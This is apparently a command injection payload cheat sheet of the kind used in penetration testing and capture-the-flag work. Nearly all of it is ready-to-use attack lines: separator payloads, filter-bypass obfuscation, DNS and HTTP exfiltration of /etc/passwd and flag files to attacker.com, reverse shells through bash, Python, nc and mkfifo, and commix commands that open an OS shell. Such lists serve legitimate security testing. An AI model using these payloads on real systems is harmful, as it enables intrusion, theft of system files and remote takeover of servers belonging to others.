Command Injection

cmd=
exec=
command=
execute=
ping=
query=
host=
ip=
filename=
path=
file=
to=
email=
template=

- Ping/DNS lookup tools
- File converters (PDF, image)
- Email sending features
- Log viewers
- System information pages
- Backup/export utilities
- Network diagnostic tools
- File management systems

; id
| id
|| id
& id
&& id
$(id)
`id`

%0aid
%0a%0did
\nid
\r\nid

; cat /etc/passwd
| cat /etc/passwd
|| cat /etc/passwd
& cat /etc/passwd
&& cat /etc/passwd
`cat /etc/passwd`
$(cat /etc/passwd)

& dir
| dir
|| dir
&& dir

dir
type flag.txt
whoami
hostname
ipconfig /all
net user
tasklist

; Get-Content flag.txt
| Get-ChildItem
; Invoke-Expression "whoami"

# Linux
; sleep 5
| sleep 5
`sleep 5`
$(sleep 5)
; ping -c 5 127.0.0.1

# Windows
& ping -n 5 127.0.0.1
| timeout 5

# DNS exfiltration
; nslookup attacker.com
; host attacker.com
; dig attacker.com
`nslookup $(whoami).attacker.com`
$(curl http://attacker.com/$(whoami))

# HTTP callback
; curl http://attacker.com/?c=$(whoami | base64)
; wget http://attacker.com/$(id)
$(curl http://attacker.com -d $(cat /etc/passwd | base64))

# Burp Collaborator
; nslookup x.burpcollaborator.net

# Write to webroot
; echo "test" > /var/www/html/test.txt
# Then check https://target.com/test.txt

{cat,/etc/passwd}
cat${IFS}/etc/passwd
cat$IFS/etc/passwd
cat$IFS$9/etc/passwd
X=$'cat\x20/etc/passwd'&&$X
cat</etc/passwd
cat%09/etc/passwd     # Tab (%09)
cat%0a/etc/passwd     # Newline

# Environment variable
${PATH:0:1}etc${PATH:0:1}passwd
# → /etc/passwd

# Hex
$(printf '\x2f')etc$(printf '\x2f')passwd

# Quote insertion
c'a't /etc/passwd
c"a"t /etc/passwd

# Backslash
c\at /etc/passwd

# Variable expansion
/???/?at /etc/passwd
/???/c?t /etc/passwd

# Base64
echo "Y2F0IC9ldGMvcGFzc3dk" | base64 -d | bash

# Hex
echo -e "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64" | bash

# Rev
$(rev<<<'dwssap/cte/ tac')

/???/??t /???/??????
# → /bin/cat /etc/passwd

/???/b??/?at /???/p??s??
# → /usr/bin/cat /etc/passwd

# Instead of cat
more /etc/passwd
less /etc/passwd
head /etc/passwd
tail /etc/passwd
tac /etc/passwd
nl /etc/passwd
xxd /etc/passwd
base64 /etc/passwd

# Instead of ls
dir
find . -type f
echo *

; id > /dev/tcp/attacker.com/80
; bash -i >& /dev/tcp/attacker.com/4444 0>&1

# Via DNS
; for i in $(cat /etc/passwd | xxd -p); do nslookup $i.attacker.com; done

# Via HTTP
; curl http://attacker.com -d "$(cat /etc/passwd | base64)"
; wget --post-data="$(cat flag.txt)" http://attacker.com/

# Via Burp Collaborator
; curl https://x.burpcollaborator.net?d=$(whoami)

; bash -i >& /dev/tcp/attacker.com/4444 0>&1

; python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("attacker.com",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

; nc -e /bin/sh attacker.com 4444
; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attacker.com 4444 >/tmp/f

- File converters (PDF, image, document)
- Network diagnostics (ping, traceroute, DNS)
- Backup/export features
- Log file viewers
- Email sending utilities
- Git/SVN integrations
- CI/CD pipelines
- Container management

1. Test all separators: ; | || & && ` $()
2. Use time-based for blind detection
3. Try OOB with Burp Collaborator
4. Test filter bypasses systematically
5. Look for error messages revealing OS

- Show RCE capability
- Demonstrate data access
- Prove code execution (hostname, id, whoami)
- Chain with other vulnerabilities

# Basic detection
commix -u "https://target.com/?ip=127.0.0.1"

# POST request
commix -u "https://target.com/" --data="ip=127.0.0.1"

# Specific technique
commix -u "URL" --technique=T  # Time-based

# Get shell
commix -u "URL" --os-shell